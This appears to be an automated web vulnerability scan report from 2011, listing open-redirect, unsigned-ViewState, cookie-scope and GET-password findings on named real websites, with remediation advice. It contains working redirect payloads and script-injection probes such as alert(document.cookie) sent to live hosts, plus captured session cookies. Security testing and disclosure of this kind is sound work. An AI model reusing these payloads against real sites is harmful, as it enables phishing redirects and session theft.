HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:46:51 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=kt1uph07r6rvoff2tchko0efd3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14989
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.jazdtech.com/techdirect/
The form contains the following password field:
password
Request
GET /techdirect/ HTTP/1.1 Host: www.jazdtech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:01:52 GMT Set-Cookie: JazdSession="a60b5303-7988-48d1-88b3-467a83635a2c:1297008112717"; Version=1; Max-Age=3600; Expires=Sun, 06-Feb-2011 17:01:52 GMT; Path=/ Set-Cookie: JazdTestCookie=1297008112717; Expires=Mon, 06-Feb-2012 16:01:52 GMT; Path=/ Set-Cookie: JSESSIONID=90039B3D2C4BBD4CB6E1E02847F77216; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Content-Length: 74356
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.technotizie.it/login-inside.php
The form contains the following password field:
pass2
Request
GET / HTTP/1.1 Host: www.technotizie.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
GET /default.aspx?tabid=168&appl_code=MEMBERS HTTP/1.1 Host: ebus.ota.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Remediation background
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
The value of the 14786739C435671106&ULP request parameter is used to perform an HTTP redirect. The payload .a3768b48eb5dcbf43/ was submitted in the 14786739C435671106&ULP parameter. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Request
GET /tpv/?14786739C435671106&ULP=.a3768b48eb5dcbf43/&zpar0=125_1_728x90_360_pvc_ad4matdedault HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:39:12 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C71884S1469386964569572361T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C71884S1469386964569572361T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:12 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.bild.de.a3768b48eb5dcbf43/&zpar0=125_1_728x90_360_pvc_ad4matdedault?zanpid=14786739C435671106T1469386964569572361 pragma: no-cache cache-control: no-store
The value of the target request parameter is used to perform an HTTP redirect. The payload http%3a//aa94df46ff741041f/a%3fhttp%3a//0.r.msn.com/%3fld%3d4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ was submitted in the target parameter. This caused a redirection to the following URL:
GET /track?target=http%3a//aa94df46ff741041f/a%3fhttp%3a//0.r.msn.com/%3fld%3d4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ&xargs=1Owx8oFMt4m2YkqUMiPXwDnPUhRRY7ZEJ9LJTWSrnbZhgBfErhtcKKOiM6mjHeLYQPOhFTlgMiQNUi0Wzinee2B3WGL1cDC9iHCONuiA3%2FJLEbd3x%2FFU5i2%2FejQpwMx5yyDTjsWiUUsISHcBq5Cyt5RwSg5CKdbMkrYy9xwqz2dX1VJJLhn25UnM9r3EOr3kRAA7PYs93YlDtwLI5JLm3nWA7dYYrFPozVln3uSAGFgS4lCNg3xHbrApZyDMytFV2l2C7ULWrmQ1l9bzagD%2FAT68Pby1uNFEA22B%2FM90suzy%2FYjy3MzE23bVmK7lC9jUeyBWeaoqNWxXGRluKS44nJO34%2BrioOQV%2FxSJ%2By45Fo8X%2FyWC5WegF0dVp6w1Bt2lFzVLgvn19KwnF%2BFWR4G6ZhENP1sKJJ8ayL0Tdvc1we8TPqrcCxAlGk5VR%2F94hQcEKqe6WwkOm3ytJOOEop9VFSJq%2FtFSYoywNhWzr%2BIMaHWBqkqSde8xNIVIc5X5QSFeoSqyFJwnv8A%3D&template=v1-450xauto\ HTTP/1.1 Host: mm.chitika.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _cc=G/SkJiIEkgB5jwthOgp2U7fj6wwhdgvL4c0tN7QIkjl+9DY+kxm0FYEPwYHEtzd1Eb9GVhAFySrB7FsCah5yekHnHk86QdWmqzPlPoX9fVgKhjoJ7H0CpjFT5Hp1o2UMeStsZFPsF38vogWeCxRsANnVfye1gm5VQVRitA3zocW7G6iOKSNpC8nW/fSMYPkd+FCgRcmr74lmkl5cwzW3Czwl6LeM3oQBJIYcJ6NbVb7AFAn8X+k1IsMDj5bEGLsE44aH3XGVfZEeq7YK0yCm1xoznT+oB6MyoGrFo+3L+n46HJMn/fIuhcbGfmpCGIWgP/8azfwodcqzdnmXzDHV02SLzkuIP4TROEiHhvvFYJCve1mdj9NNH2b6m71cRkwsP7WlTZEvF7RLkkrfjucSwCzhr5Z1qjMilr/trLois3rxw1y+NdQfz3XqMUHrYIFc6GSu7GKj22sCBmPetmAel7epjXByEoA7.VuO7eR5Qy1Z0VmN7sMLZzA.4;
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:58:26 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=...[SNIP]....r+pUKck79gCJz8mn8ogGtg.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:58:26 GMT Location: http://aa94df46ff741041f/a?http://0.r.msn.com/?ld=4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ Content-Length: 632 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://aa94df46ff741041f/a?http://0.r.msn.com/? ...[SNIP]...
The value of the Referer HTTP header is used to perform an HTTP redirect. The payload //a3998e29f3264cd04/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d was submitted in the Referer HTTP header. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by blocking absolute redirection targets starting with http:// or https://. However, an attacker can defeat this defense by omitting the protocol prefix from their absolute URL. If a redirection target starting with // is specified, then the browser will use the same protocol as the page which issued the redirection.
Because the data used in the redirection is submitted within a header, the application's behaviour is unlikely to be directly useful in lending credibility to a phishing attack. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
When attempting to block absolute redirection targets, the application should verify that the target begins with a single slash followed by a letter, and should reject any input containing a sequence of two slash characters.
Request
GET /ads/adclick.php HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313; Referer: //a3998e29f3264cd04/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:39:44 GMT Server: Apache X-Powered-By: PHP/4.4.7 Location: //a3998e29f3264cd04/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d Content-Length: 0 Connection: close Content-Type: text/html
The value of the Referer HTTP header is used to perform an HTTP redirect. The payload //af59a3cd4a9062842/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d was submitted in the Referer HTTP header. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by blocking absolute redirection targets starting with http:// or https://. However, an attacker can defeat this defense by omitting the protocol prefix from their absolute URL. If a redirection target starting with // is specified, then the browser will use the same protocol as the page which issued the redirection.
Because the data used in the redirection is submitted within a header, the application's behaviour is unlikely to be directly useful in lending credibility to a phishing attack. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
When attempting to block absolute redirection targets, the application should verify that the target begins with a single slash followed by a letter, and should reject any input containing a sequence of two slash characters.
Request
GET /index.php/sso_checker HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8; Referer: //af59a3cd4a9062842/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 22:49:29 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; expires=Mon, 07-Mar-2011 22:49:29 GMT; path=/; domain=.manualsonline.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=26; __utmz=162857765.1296956996.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=5378e2dc-3193-11e0-bdbb-0030485f67c6; adsust=n1; adsus=26b9sk; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296956996.2; __utmc=162857765; __utmb=162857765.1.10.1296956996;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 22:49:36 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; expires=Mon, 07-Mar-2011 22:49:36 GMT; path=/; domain=.manualsonline.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /managemystuff.html HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
<p>Access thousands of manuals, user community, personal homepage, original blog content and newsletters!</p> <form onsubmit="javascript: submitRegistration('Popup'); return false;" id="sRegFormIdPopu ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /regman/mem/initsession?sessionargs=YToyOntzOjM6InVyaSI7czoxMTQ6Ii9leC9tZmcvaGVhZGxpbmUvbS9hcmllbnM0Nzg4OCUyNTI3JTI1M2JhbGVydCUyNTI4ZG9jdW1lbnQuY29va2llJTI1MjklMjUyZiUyNTJmOGZjZjE2N2QyODEvZC90eXBlL3Byb2R1Y3RfcHJvYmxlbSI7czo2OiJzZXJ2ZXIiO3M6MzE6ImhvbWVhcHBsaWFuY2UubWFudWFsc29ubGluZS5jb20iO30, HTTP/1.1 Host: session.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/articles/intel-cloud-builders/?cid\u003dvibrantlogo4 HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sites/oss/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /t/v1/clk HTTP/1.1 Host: t.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="/t/v1/clk/cc">here</a>.</p> <hr> <address>Apach ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:25 GMT Server: Server Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sat, 05-Feb-2011 23:01:25 GMT x-amz-id-1: 0KCJW8RY05PKJVC74BS4 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: ZOHvQ9RGUMwBOJTa2KvnRusGxeBk9Xx5NIoqKO+M/pseIEcTTQSnTJ7z6CUtyShJ Vary: Accept-Encoding,User-Agent nnCoection: close Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=188-9552736-3777102; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 131368
<html> <head>
<style type="text/css"><!--
BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.box.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.coe.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 ETag: "cd5e8abd80fd03f2c8d32b33e06270c9" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Set-Cookie: SESSe21231bc09705de79a97f2d6b2e890fb=645k56n5kokbe2trg1b1r6h6e7; expires=Tue, 01-Mar-2011 01:27:06 GMT; path=/; domain=.coe.gatech.edu Last-Modified: Fri, 04 Feb 2011 19:45:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.diigo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
